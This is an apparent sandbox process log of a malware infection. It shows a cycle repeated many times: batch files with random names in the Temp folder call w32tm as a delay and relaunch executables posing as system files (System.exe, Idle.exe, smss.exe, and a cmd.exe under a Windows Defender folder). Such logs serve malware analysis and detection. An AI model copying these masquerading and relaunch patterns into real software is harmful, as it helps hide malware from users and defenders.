"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\KxKP0srito.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\L9j9zErPDE.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\eNTIt1NKYH.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\sPXGbYzrvf.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\0P1AeAAEDQ.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\xjNnGM38uG.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\uuaNNDTqg5.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\dgWvFyiHB2.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\tebxeZNirC.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\uxMZkGAiOs.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\WVE2eLfZN7.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\C0VS1u4WCC.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\jnfhf9Euk8.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\wpigNgqS7W.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\aJcBxrOCPY.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\EtrZeLjFvq.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\jkzlbVqk90.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\iu0amT0ExO.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ww4YVzclJm.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\vCRFnHZZKP.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\QwDZd8tkMK.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\IJ9EkrtYDM.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\qzxbGmHcY3.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\eNTIt1NKYH.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\UZ6jdsJyxg.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Mw1PlbJmoj.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\YwiSfj46e4.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\f4KPDhjeqr.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\8t4fMT0wY0.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\KtkjGbmHOL.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\T3kbcxG26A.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\hfpeQ4JfvC.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ATZuYpZxcK.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\2qVagYZlTM.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\aWJwCUxpp4.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\jhJpXqSaXt.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\xc1v93Hoh1.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ST975DOJvB.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Ljju5cbnZy.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Wqkq749RcZ.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Rn5V8mQYRH.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ay5NT8uJA6.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\7etkz3INVn.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\cOf3pucYXi.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\SpZgFYZT4y.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Q3ZRkRg4YZ.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\wpigNgqS7W.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\aJcBxrOCPY.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\TmtjCtAJTq.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\N4rS0hE0df.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\GQn77QEoUi.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\q2cXKRfm9B.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\18eSMsDQCm.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Windows\system32\taskeng.exe
taskeng.exe {9F4EE8F7-AC11-4DE4-B14F-8C27A906E828} S-1-5-21-2212144002-1172735686-1556890956-1000:MVFYZPLM\Admin:Interactive:[1]
C:\Users\Default User\Idle.exe
"C:\Users\Default User\Idle.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\GrfoiSU1wP.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\2K3DLFE7WC.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\Idle.exe
"C:\Users\Default User\Idle.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\64IFTJQeKo.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\pkmftNZ3Wr.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\Idle.exe
"C:\Users\Default User\Idle.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\fg7ffKrc0I.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\QOz0umrEhM.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\Idle.exe
"C:\Users\Default User\Idle.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\8Usvo58uhQ.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\NczlPfxoCy.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\Idle.exe
"C:\Users\Default User\Idle.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\fBgHK1Vy37.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\wLA3izB53h.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\Idle.exe
"C:\Users\Default User\Idle.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\AvSbArq942.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\9dhy3B39XM.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\Idle.exe
"C:\Users\Default User\Idle.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\lZfwAG7KGX.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\BikqvEHWfW.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\Idle.exe
"C:\Users\Default User\Idle.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\evbbIz777a.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\cYhs0sn2L6.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\Idle.exe
"C:\Users\Default User\Idle.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\UMVEid32eq.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\WqeaogqjWu.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\Idle.exe
"C:\Users\Default User\Idle.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\eQ9EwglUAP.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\8Usvo58uhQ.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\Idle.exe
"C:\Users\Default User\Idle.exe"
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Zi7wkUpBKE.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\xHU7fKnwSZ.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\VG36Hwy0Lv.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\Idle.exe
"C:\Users\Default User\Idle.exe"
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\WtKWrLEt72.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe
"C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\rd8mWnFnEV.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe
"C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\QLJ4q7S46F.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe
"C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\2tBWjDxv5U.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe
"C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\IrGY9odMle.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe
"C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\wRWwqJyPGw.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe
"C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ATZuYpZxcK.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe
"C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\LabqbH8bfv.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe
"C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ZcfpJnj91J.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe
"C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\9EVEWoB6gn.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe
"C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\LEBHQwxRW8.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe
"C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe"
C:\Program Files (x86)\Windows Defender\es-ES\cmd.exe
"C:\Program Files (x86)\Windows Defender\es-ES\cmd.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\dFeEewS5jL.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\gMBHdlpNUB.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe
"C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\TZCyxGcg3L.bat"
C:\Program Files (x86)\Windows Defender\es-ES\cmd.exe
"C:\Program Files (x86)\Windows Defender\es-ES\cmd.exe"
C:\Windows\system32\w32tm.exe
